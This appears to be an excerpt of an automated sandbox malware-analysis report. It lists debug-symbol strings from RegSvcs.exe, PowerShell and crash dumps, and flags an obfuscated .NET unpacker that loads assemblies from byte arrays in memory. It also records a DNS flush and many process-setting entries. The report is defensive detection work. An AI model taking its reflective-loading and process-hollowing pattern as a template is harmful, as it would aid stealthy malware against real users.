Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\exe\RegSvcs.pdbX source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C32000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1680199968.000001B58A454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1701713981.000001B5A1990000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbs source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C32000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbUV source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbP source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: %%.pdb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: Microsoft.VisualBasic.pdblX source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp, WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.pdbMZ source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdb\mbqD0 source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb?U% source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERD6CE.tmp.dmp.10.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.powershell.exe.1b599389800.4.raw.unpack, -----------------------------------------.cs	.Net Code: _202B_200C_206B_202B_200F_202E_206A_206B_206F_206A_206F_206D_206B_206B_202B_202E_200B_200D_206C_202C_200E_200C_206B_202B_200C_200E_202E_200B_202A_200D_200C_206E_200B_206E_206E_202A_200B_206D_202A_202C_202E System.AppDomain.Load(byte[])
Source: 0.2.powershell.exe.1b599389800.4.raw.unpack, -Module-.cs	.Net Code: _202B_202D_200B_200C_202A_206F_206C_206C_200E_200E_202C_206B_200B_200E_202B_202B_200B_206B_200E_206D_206C_202B_200C_206F_206C_202A_200F_206F_206F_202D_206C_206A_206B_206E_202A_200C_202E_206A_200D_200F_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_00007FFD9B8B8D84 pushad ; ret

0_2_00007FFD9B8B8D86

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
